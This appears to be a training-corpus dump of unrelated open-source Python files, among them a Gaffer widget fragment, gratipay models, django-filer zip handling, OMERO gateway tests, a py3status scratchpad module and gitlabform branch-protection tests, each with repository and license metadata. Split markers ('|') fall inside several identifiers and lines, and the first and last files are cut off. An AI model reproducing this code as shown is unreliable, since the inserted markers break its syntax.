# stylesheet.
self._qtWidget().setProperty( "gafferMenuIndicator", text != "" )
def __pressed( self ) :
if self.__menu is None :
return
b = self.bound()
self.__menu.popup(
parent = self,
position = imath.V2i( b.min().x, b.max().y ),
)
def __menuVisibilityChanged( self, menu ) :
if not menu.visible() :
self._qtWidget().setDown( False )
# There is a bug whereby Button never receives the event for __leave,
# if the menu is shown. This results in the image highlight state sticking.
if self.widgetAt( self.mousePosition() ) is not self :
self._Button__leave( self )
|
gratipay/gratipay.com | gratipay/models/package/team.py | Python | mit | 3,131 | 0.013095 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import uuid
from gratipay.models.team import Team as _Team
class Team(object):
"""A :py:class:`~gratipay.models.package.Package` can have a
:py:class:`~gratipay.models.team.Team` associated with it.
"""
@property
def team(self):
"""A computed attribute, the :py:class:`~gratipay.models.team.Team`
linked to this package if there is one, otherwise ``None``. Makes a
database call.
"""
return self.load_team(self.db)
def load_team(self, cursor):
"""Given a database cursor, return a
:py:class:`~gratipay.models.team.Team` if there is one linked to this
package, or ``None`` if not.
"""
return cursor.one( 'SELECT t.*::teams FROM teams t WHERE t.id='
'(SELECT team_id FROM teams_to_packages tp WHERE tp.package_id=%s)'
, (self.id,)
)
def get_or_create_linked_team(self, cursor, owner):
"""Given a db cursor and a :py:class:`Participant`, return a
:py:class:`~gratipay.models.team.Team`.
"""
team = self.load_team(cursor)
if team:
return team
def slug_options():
# Having analyzed existing names, we should never get `@` without
# `/`. Be conservative in what we accept! Oh, wait ...
base_name = self.name.split('/')[1] if self.name.startswith('@') else self.name
yield base_name
for i in range(1, 10):
| yield '{}-{}'.format(base_name, i)
yield uuid.uuid4().hex
for slug in slug_options():
if cursor.one('SELECT count(*) FROM teams WHERE slug=%s', (slug,)) == 0:
break |
team = _Team.insert( slug=slug
, slug_lower=slug.lower()
, name=slug
, homepage='https://www.npmjs.com/package/' + self.name
, product_or_service=self.description
, owner=owner
, _cursor=cursor
)
cursor.run('INSERT INTO teams_to_packages (team_id, package_id) '
'VALUES (%s, %s)', (team.id, self.id))
self.app.add_event( cursor
, 'package'
, dict(id=self.id, action='link', values=dict(team_id=team.id))
)
return team
def unlink_team(self, cursor):
"""Given a db cursor, unlink the team associated with this package
(it's a bug if called with no team linked).
"""
team = self.load_team(cursor)
assert team is not None # sanity check
cursor.run('DELETE FROM teams_to_packages WHERE package_id=%s', (self.id,))
self.app.add_event( cursor
, 'package'
, dict(id=self.id, action='unlink', values=dict(team_id=team.id))
)
|
ojii/django-filer | filer/utils/zip.py | Python | mit | 916 | 0.00655 | import os
#import zipfile
# zipfile.open() is only available in Python 2.6, so we use the future version
from django.core.files.uploadedfile import SimpleUploadedFile
from filer.utils import zipfile
def unzip(file):
"""
Take a path to a zipfile and checks if it is a valid zip file
and returns...
"""
files = []
# TODO: implement try-except here
zip = zipfile.ZipFile(file)
bad_file = zip.testzip()
| if bad_file:
raise Exception('"%s" in the .zip archive is corrupt.' % bad_file)
| infolist = zip.infolist()
print infolist
for zipinfo in infolist:
print "handling %s" % zipinfo.filename
if zipinfo.filename.startswith('__'): # do not process meta files
continue
thefile = SimpleUploadedFile(name=zipinfo.filename, content=zip.read(zipinfo))
files.append( (thefile, zipinfo.filename) )
zip.close()
return files
|
savioabuga/phoenix | phoenix/health/views.py | Python | bsd-3-clause | 1,766 | 0.003964 | from django.core.urlresolvers import reverse
from smartmin.views import SmartCR | UDL, SmartCreateView, SmartReadView, SmartUpdateView, SmartListView
from .models import Treatment
from .forms import TreatmentForm
class TreatmentCRUDL(SmartCRUDL):
model = Treatment
actions = ('create', 'read', 'update', 'list')
class Create(SmartCreateView):
form_class = TreatmentForm
fields = ('date', 'description', 'animals', 'notes')
class Read(SmartReadView):
| fields = ('date', 'description', 'notes', 'animals')
def get_animals(self, obj):
animals = ''
for animal in obj.animals.all():
animals += '<a href=' + reverse('animals.animal_read', args=[animal.id]) + '>' + str(animal) + '</a>, '
return animals[:-2]
class Update(SmartUpdateView):
form_class = TreatmentForm
def customize_form_field(self, name, field):
field = super(TreatmentCRUDL.Update, self).customize_form_field(name, field)
if name == 'animals':
# Force the minimumInputLength to 0, so that it shows all the contacts by default
field.widget.options['minimumInputLength'] = 0
treatment = self.get_object()
animals = treatment.animals
field.widget.choices = [(animal.id, str(animal)) for animal in animals.order_by('name').all()]
field.initial = [animal.id for animal in animals.order_by('name').all()]
return field
class List(SmartListView):
fields = ('id', 'date', 'description', 'notes')
def get_queryset(self, **kwargs):
queryset = super(TreatmentCRUDL.List, self).get_queryset(**kwargs)
return queryset |
otsaloma/gaupol | gaupol/agents/format.py | Python | gpl-3.0 | 2,965 | 0 | # -*- coding: utf-8 -*-
# Copyright (C) 2005 Osmo Salomaa
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Formatting text."""
import aeidon
class FormatAgent(aeidon.Delegate):
"""Formatting text."""
@aeidon.deco.export
def _on_toggle_dialogue_dashes_activate(self, *args):
"""Add or remove dialogue dashes on the selected texts."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.toggle_dialogue_dashes(rows, doc)
@aeidon.deco.export
def _on_toggle_italicization_activate(self, *args):
"""Italicize or unitalicize the selected texts."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.toggle_italicization(rows, doc)
@aeidon.deco.export
def _on_use_lower_case_activate(self, *args):
"""Change the selected texts to lower case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.pr | oject.change_case(rows, doc, "lower")
@aeidon.deco.export
def _on_use_sentence_case_activate(self, *args):
"""Change the selected texts to sentence case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_col | umn_to_document(col)
page.project.change_case(rows, doc, "capitalize")
@aeidon.deco.export
def _on_use_title_case_activate(self, *args):
"""Change the selected texts to title case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.change_case(rows, doc, "title")
@aeidon.deco.export
def _on_use_upper_case_activate(self, *args):
"""Change the selected texts to upper case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.change_case(rows, doc, "upper")
|
v00d00dem0n/PyCrashCourse | work/ch15/colormap_example.py | Python | gpl-3.0 | 3,677 | 0 | """
==================
Colormap reference
==================
Reference for colormaps included with Matplotlib.
This reference example shows all colormaps included with Matplotlib. Note that
any colormap listed here can be reversed by appending "_r" (e.g., "pink_r").
These colormaps are divided into the following categories:
Sequential:
These colormaps are approximately monochromatic colormaps varying smoothly
between two color tones---usually from low saturation (e.g. white) to high
saturation (e.g. a bright blue). Sequential colormaps are ideal for
representing most scientific data since they show a clear progression from
low-to-high values.
Diverging:
These colormaps have a median value (usually light in color) and vary
smoothly to two different color tones at high and low values. Diverging
colormaps are ideal when your data has a median value that is significant
(e.g. 0, such that positive and negative values are represented by
different colors of the colormap).
Qualitative:
These colormaps vary rapidly in color. Qualitative colormaps are useful for
choosing a set of discrete colors. For example::
color_list = plt.cm.Set3(np.linspace(0, 1, 12))
gives a list of RGB colors that are good for plotting a series of lines on
a dark background.
Miscellaneous:
Colormaps that don't fit into the categories above.
"""
import numpy as np
import matplotlib.pyplot as plt
# Have colormaps separated into categories:
# http://matplotlib.org/examples/color/colormaps_reference.html
cmaps = [('Perceptually Uniform Sequential', [
'viridis', 'plasma', 'inferno', 'magma']),
('Sequential', [
'Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',
'YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',
'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']),
('Sequential (2)', [
'binary', 'gist_yarg', 'gist_gray', 'gray', 'bone', 'pink',
'spring', 'summer', 'autumn', 'winter', 'cool', 'Wistia',
'hot', 'afmhot', 'gist_heat', 'copper']),
('Diverging', [
'PiYG', 'PRGn', 'BrBG', 'PuOr', 'RdGy', 'RdBu',
'RdYlBu', 'RdYlGn', 'Spectral', 'coolwarm', 'bwr', 'seismic']),
('Qualitative', [
'Pastel1', 'Pastel2', 'Paired', 'Accent',
'Dark2', 'Set1', 'Set2', 'Set3',
'tab10', 'tab20', 'tab20b', 'tab20c']),
('Miscellaneous', [
'flag', 'prism', 'ocean', 'gist_earth', 'terrain', 'gist_stern',
'gnuplot', 'gnuplot2', 'CMRmap', 'cubehelix', 'brg', 'hsv',
'gist_rainbow', 'rainbow', 'jet', 'nipy_spectral', 'gist_ncar'])]
nrows = max(len(cmap_list) for cmap_category, cmap_list in cmaps)
gradient = np.linspace(0, 1, 256)
gradient = np.vstack((gradient, gradient))
def plot_color_gradients(cmap_category, cmap_list, nrows):
fig, axes = p | lt.subplots(nrows=nrows)
fig.subplots_adjust(top=0.95, bottom=0.01, left=0.2, right=0.99)
axes[0].set_title(cmap_category + ' colormaps', fontsize=14 | )
for ax, name in zip(axes, cmap_list):
ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(name))
pos = list(ax.get_position().bounds)
x_text = pos[0] - 0.01
y_text = pos[1] + pos[3]/2.
fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)
# Turn off *all* ticks & spines, not just the ones with colormaps.
for ax in axes:
ax.set_axis_off()
for cmap_category, cmap_list in cmaps:
plot_color_gradients(cmap_category, cmap_list, nrows)
plt.savefig(cmap_category+'.png', dpi=150)
plt.show()
|
tp81/openmicroscopy | components/tools/OmeroPy/test/integration/gatewaytest/test_connection.py | Python | gpl-2.0 | 8,597 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2009-2013 Glencoe Software, Inc. All rights reserved.
Use is subject to license terms supplied in LICENSE.txt
pytest fixtures used as defined in conftest.py:
- gatewaywrapper
- author_testimg
"""
import omero
import Ice
from omero.gateway.scripts import dbhelpers
import pytest
class TestConnectionMethods(object):
def testMultiProcessSession(self, gatewaywrapper):
# 120 amongst other things trying to getSession() twice for t | he same
# session dies. Also in separate processes.
# we mimic this by calling setGroupForSessio | n, which calls
# sessionservice.getSession, 2 times on cloned connections
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.gateway.getSession() is not None
c2 = gatewaywrapper.gateway.clone()
assert c2.connect(sUuid=gatewaywrapper.gateway._sessionUuid)
assert c2.getSession() is not None
a = c2.getAdminService()
g = omero.gateway.ExperimenterGroupWrapper(
c2, a.containedGroups(c2.getUserId())[-1])
c2.setGroupForSession(g)
c3 = gatewaywrapper.gateway.clone()
assert c3.connect(sUuid=gatewaywrapper.gateway._sessionUuid)
assert c3.getSession() is not None
a = c3.getAdminService()
g = omero.gateway.ExperimenterGroupWrapper(
c3, a.containedGroups(c3.getUserId())[1])
c3.setGroupForSession(g)
def testSeppuku(self, gatewaywrapper, author_testimg):
# author_testimg in args to make sure the image has been imported
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.getTestImage() is not None
gatewaywrapper.gateway.seppuku()
pytest.raises(Ice.ConnectionLostException, gatewaywrapper.getTestImage)
gatewaywrapper._has_connected = False
gatewaywrapper.doDisconnect()
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.getTestImage() is not None
gatewaywrapper.gateway.seppuku(softclose=False)
pytest.raises(Ice.ConnectionLostException, gatewaywrapper.getTestImage)
gatewaywrapper._has_connected = False
gatewaywrapper.doDisconnect()
# Also make sure softclose does the right thing
gatewaywrapper.loginAsAuthor()
g2 = gatewaywrapper.gateway.clone()
def g2_getTestImage():
return dbhelpers.getImage(g2, 'testimg1')
assert g2.connect(gatewaywrapper.gateway._sessionUuid)
assert gatewaywrapper.getTestImage() is not None
assert g2_getTestImage() is not None
g2.seppuku(softclose=True)
pytest.raises(Ice.ConnectionLostException, g2_getTestImage)
assert gatewaywrapper.getTestImage() is not None
g2 = gatewaywrapper.gateway.clone()
assert g2.connect(gatewaywrapper.gateway._sessionUuid)
assert gatewaywrapper.getTestImage() is not None
assert g2_getTestImage() is not None
g2.seppuku(softclose=False)
pytest.raises(Ice.ConnectionLostException, g2_getTestImage)
pytest.raises(Ice.ObjectNotExistException, gatewaywrapper.getTestImage)
gatewaywrapper._has_connected = False
gatewaywrapper.doDisconnect()
def testTopLevelObjects(self, gatewaywrapper, author_testimg):
##
# Test listProjects as root (sees, does not own)
parents = author_testimg.getAncestry()
project_id = parents[-1].getId()
# Original (4.1) test fails since 'admin' is logged into group 0, but
# the project created above is in new group.
# gatewaywrapper.loginAsAdmin()
# test passes if we remain logged in as Author
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id in ids
# test passes if we NOW log in as Admin (different group)
gatewaywrapper.loginAsAdmin()
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id not in ids
##
# Test listProjects as author (sees, owns)
gatewaywrapper.loginAsAuthor()
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id in ids
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id in ids
##
# Test listProjects as guest (does not see, does not own)
gatewaywrapper.doLogin(gatewaywrapper.USER)
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id not in ids
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id not in ids
##
# Test getProject
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.gateway.getObject(
"Project", project_id).getId() == project_id
##
# Test getDataset
dataset_id = parents[0].getId()
assert gatewaywrapper.gateway.getObject(
"Dataset", dataset_id).getId() == dataset_id
##
# Test listExperimenters
# exps = map(lambda x: x.omeName,
# gatewaywrapper.gateway.listExperimenters()) # removed from blitz
# gateway
exps = map(lambda x: x.omeName,
gatewaywrapper.gateway.getObjects("Experimenter"))
for omeName in (gatewaywrapper.USER.name, gatewaywrapper.AUTHOR.name,
gatewaywrapper.ADMIN.name.decode('utf-8')):
assert omeName in exps
assert len(list(gatewaywrapper.gateway.getObjects(
"Experimenter", attributes={'omeName': omeName}))) > 0
comboName = gatewaywrapper.USER.name + \
gatewaywrapper.AUTHOR.name + gatewaywrapper.ADMIN.name
assert len(list(gatewaywrapper.gateway.getObjects(
"Experimenter", attributes={'omeName': comboName}))) == 0
##
# Test lookupExperimenter
assert gatewaywrapper.gateway.getObject(
"Experimenter",
attributes={'omeName': gatewaywrapper.USER.name}).omeName == \
gatewaywrapper.USER.name
assert gatewaywrapper.gateway.getObject(
"Experimenter", attributes={'omeName': comboName}) is None
##
# still logged in as Author, test listImages(ns)
def listImages(ns=None):
imageAnnLinks = gatewaywrapper.gateway.getAnnotationLinks("Image",
ns=ns)
return [omero.gateway.ImageWrapper(gatewaywrapper.gateway,
link.parent) for link in imageAnnLinks]
ns = 'weblitz.test_annotation'
obj = gatewaywrapper.getTestImage()
# Make sure it doesn't yet exist
obj.removeAnnotations(ns)
assert obj.getAnnotation(ns) is None
# Check without the ann
assert len(listImages(ns=ns)) == 0
annclass = omero.gateway.CommentAnnotationWrapper
# createAndLink
annclass.createAndLink(target=obj, ns=ns, val='foo')
imgs = listImages(ns=ns)
assert len(imgs) == 1
assert imgs[0] == obj
# and clean up
obj.removeAnnotations(ns)
assert obj.getAnnotation(ns) is None
def testCloseSession(self, gatewaywrapper):
# 74 the failed connection for a user not in the system group does not
# get closed
gatewaywrapper.gateway.setIdentity(
gatewaywrapper.USER.name, gatewaywrapper.USER.passwd)
setprop = gatewaywrapper.gateway.c.ic.getProperties().setProperty
map(lambda x: setprop(x[0], str(x[1])),
gatewaywrapper.gateway._ic_props.items())
gatewaywrapper.gateway.c.ic.getImplicitContext().put(
omero.constants.GROUP, gatewaywrapper.gateway.group)
# I'm not certain the following assertion is as intended.
# This should be reviewed, see ticket #6037
# assert gatewaywrapper.gateway._sessionUuid == None
pytest.raises(omero.ClientError, gatewaywrapper.gateway._createSession)
assert gatewaywrapper.gateway._sessionUuid is not None
|
davzhang/helix-python-binding | org/apache/helix/store/zk/ZNode.py | Python | apache-2.0 | 3,019 | 0.007287 | # package org.apache.helix.store.zk
#from org.apache.helix.store.zk import *
#from java.util import Collections
#from java.util import HashSet
#from java.util import List
#from java.util import Set
#from org.apache.zookeeper.data import Stat
import copy
from kazoo.protocol.states import ZnodeStat
from org.apache.helix.util.ZKConstants import HelixZNodeStat
class ZNode:
"""
Java modifiers:
final static
Type:
Stat
"""
ZERO_STAT = HelixZNodeStat()
"""
Parameters:
String zkPath
Object data
Stat stat
"""
def __init__(self, zkPath, data, stat):
self._zkPath = zkPath
# self._childSet = Collections.emptySet()
self._childSet = set()
self._data = data
self._stat = stat
def removeChild(self, child):
"""
Returns void
Parameters:
child: String
"""
# if self._childSet != Collections.emptySet():
if self._childSet:
self._childSet.remove(child)
def addChild(self, child):
"""
Returns void
Parameters:
child: String
"""
if not self._childSet:
self._childSet = set()
self._childSet.add(child)
def addChildren(self, children):
"""
Returns void
Parameters:
children: List<String>
"""
# if children != None and not children.isEmpty():
if children:
if not self._childSet:
self._childSet = set()
self._childSet.update(children)
def hasChild(self, child):
"""
Returns boolean
Parameters:
child: String
"""
return self._childSet.__contains__(child)
def getChildSet(self):
"""
Returns Set<String>
"""
return self._childSet
def setData(self, data):
"""
Returns void
Parameters:
data: Object
"""
self._data = data
def getData(self):
"""
Returns Object
"""
return self._dat | a
def setStat(self, stat):
"""
Returns void
Parameters:
stat: Stat
"""
self._stat = stat
def getStat(self):
"""
Returns Stat
"""
return self._stat
def setChildSet(self, childNames):
"""
Returns void
Parameters:
childNames: | List<String>
"""
# if self._childSet == Collections.emptySet():
if childNames:
# if not self._childSet:
# self._childSet = set()
self._childSet = copy.copy(childNames)
# self._childSet.clear()
# self._childSet.addAll(childNames)
def toString(self):
"""
Returns String
@Override
"""
return self._zkPath + ", " + self._data + ", " + self._childSet + ", " + self._stat
|
Andrwe/py3status | py3status/modules/scratchpad.py | Python | bsd-3-clause | 5,375 | 0.001674 | # -*- coding: utf-8 -*-
"""
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\?not_zero \u232b [\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
leaves = i3.get_tree().scratchpad().leaves()
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchp | ad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum([window["urgent"] for window in leaves]),
| }
def find_scratchpad(self, tree):
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": "\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
CIGIHub/greyjay | greyjay/articles/migrations/0024_auto_20150722_1928.py | Python | mit | 369 | 0 | # -*- codi | ng: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0023_auto_20150716_2129'),
]
operations = [
migrations.AlterModelOptions(
| name='topic',
options={'ordering': ['name']},
),
]
|
agilman/django_maps2 | maps/signals.py | Python | mit | 601 | 0.018303 |
#print("OK, imported signal handling")
from registration.signals import user_registered
import os
from django_maps2 import settings
#This callback is listening for user to register. Creates directories for user images.
def postRegistration(sender,user,request, **kwargs):
m | edia_root = settings.USER_MEDIA_ROOT
if not os.path.exists(media_root +"/"+ str(user.pk)):
os.mkdir(media_root + "/" + str(user.pk))
os.mkdir(media_root + "/" + str(user.pk)+"/profile_pictures")
#print("hello, got user registration signal")
user_registered.connect(postRegist | ration)
|
rwgdrummer/maskgen | plugins/OutputPDF/__init__.py | Python | bsd-3-clause | 1,012 | 0.021739 | from PIL import Image
from maskgen import exif
import numpy as np
import PIL
"""
Save the image as PDF. If the image has a orientation and 'Image Rotated', rotate the image according to the EXIF.
"""
def transform(img,source,target, **kwargs):
if 'resolution' in kwargs:
res = float(int(kwargs['resolution']))
else:
res = 200.0
im = img.convert('RGB').to_array()
Image.fromarray(im).save(target,format='PDF',resolution=res)
return None,None
def operation():
return {'name':'OutputPDF',
'category':'Output',
'description':'Save an image as .pdf',
'software':'PIL',
| 'version':PIL.__version__,
'arguments':{
'resolution':{
| 'type':'int',
'defaultvalue':'100',
'description':'DPI'
}
},
'transitions': [
'image.image'
]
}
def suffix():
return '.pdf'
|
egnyte/gitlabform | tests/acceptance/test_branches.py | Python | mit | 32,440 | 0.001326 | import pytest
from gitlabform.gitlab import AccessLevel
from tests.acceptance import (
run_gitlabform,
DEFAULT_README,
get_gitlab,
)
gl = get_gitlab()
@pytest.fixture(scope="function")
def branches(request, gitlab, group_and_project):
branches = [
"protect_branch_but_allow_all",
"protect_branch_with_code_owner_approval_required",
"protect_branch_and_disallow_all",
"protect_branch_and_allow_merges",
"protect_branch_and_allow_pushes",
"protect_branch_and_allow_merges_access_levels",
"protect_branch_and_allow_pushes_access_levels",
"protect_branch_and_allowed_to_push",
"protect_branch_and_allowe | d_to_merge",
"protect_branch_and_allow_access_l | evels_with_user_ids",
"protect_branch",
]
for branch in branches:
gitlab.create_branch(group_and_project, branch, "main")
def fin():
for branch in branches:
gitlab.delete_branch(group_and_project, branch)
gitlab.set_file(
group_and_project,
"main",
"README.md",
DEFAULT_README,
"Reset default content",
)
request.addfinalizer(fin)
@pytest.fixture(scope="function")
def one_maintainer_and_two_developers(gitlab, group_and_project, users):
gitlab.add_member_to_project(
group_and_project, users[0], AccessLevel.MAINTAINER.value
)
gitlab.add_member_to_project(
group_and_project, users[1], AccessLevel.DEVELOPER.value
)
gitlab.add_member_to_project(
group_and_project, users[2], AccessLevel.DEVELOPER.value
)
yield group_and_project
# we try to remove all users, not just the 3 added above,
# on purpose, as more may have been added in the tests
for user in users:
gitlab.remove_member_from_project(group_and_project, user)
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab, group_and_project, branches):
protect_branch_but_allow_all = f"""
projects_and_groups:
{group_and_project}:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(protect_branch_but_allow_all, group_and_project)
branch = gitlab.get_branch(group_and_project, "protect_branch_but_allow_all")
assert branch["protected"] is True
assert branch["developers_can_push"] is True
assert branch["developers_can_merge"] is True
# @pytest.mark.skipif(
# gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
# )
# def test__code_owners_approval(self, gitlab, group_and_project, branches):
# group_and_project = group_and_project
#
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, "protect_branch_but_allow_all"
# )
# assert branch_access_levels["code_owner_approval_required"] is False
#
# protect_branch_with_code_owner_approval_required = f"""
# projects_and_groups:
# {group_and_project}:
# branches:
# protect_branch_with_code_owner_approval_required:
# protected: true
# developers_can_push: false
# developers_can_merge: true
# code_owner_approval_required: true
# """
#
# run_gitlabform(
# protect_branch_with_code_owner_approval_required, group_and_project
# )
#
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, "protect_branch_with_code_owner_approval_required"
# )
# assert branch_access_levels["code_owner_approval_required"] is True
def test__protect_branch_and_disallow_all(
self, gitlab, group_and_project, branches
):
protect_branch_and_disallow_all = f"""
projects_and_groups:
{group_and_project}:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
run_gitlabform(protect_branch_and_disallow_all, group_and_project)
branch = gitlab.get_branch(group_and_project, "protect_branch_and_disallow_all")
assert branch["protected"] is True
assert branch["developers_can_push"] is False
assert branch["developers_can_merge"] is False
def test__mixed_config(self, gitlab, group_and_project, branches):
mixed_config = f"""
projects_and_groups:
{group_and_project}:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
run_gitlabform(mixed_config, group_and_project)
branch = gitlab.get_branch(group_and_project, "protect_branch_and_allow_merges")
assert branch["protected"] is True
assert branch["developers_can_push"] is False
assert branch["developers_can_merge"] is True
branch = gitlab.get_branch(group_and_project, "protect_branch_and_allow_pushes")
assert branch["protected"] is True
assert branch["developers_can_push"] is True
assert branch["developers_can_merge"] is False
unprotect_branches = f"""
projects_and_groups:
{group_and_project}:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
run_gitlabform(unprotect_branches, group_and_project)
for branch in [
"protect_branch_and_allow_merges",
"protect_branch_and_allow_pushes",
]:
branch = gitlab.get_branch(group_and_project, branch)
assert branch["protected"] is False
def test__mixed_config_with_new_api(
self,
gitlab,
group_and_project,
branches,
users,
one_maintainer_and_two_developers,
):
mixed_config_with_access_levels = f"""
projects_and_groups:
{group_and_project}:
branches:
protect_branch_and_allow_merges_access_levels:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.DEVELOPER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
'*_allow_pushes_access_levels':
protected: true
push_access_level: {AccessLevel.DEVELOPER.value}
merge_access_level: {AccessLevel.DEVELOPER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(mixed_config_with_access_levels, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(
group_and_project, "protect_branch_and_allow_merges_access_levels"
)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(
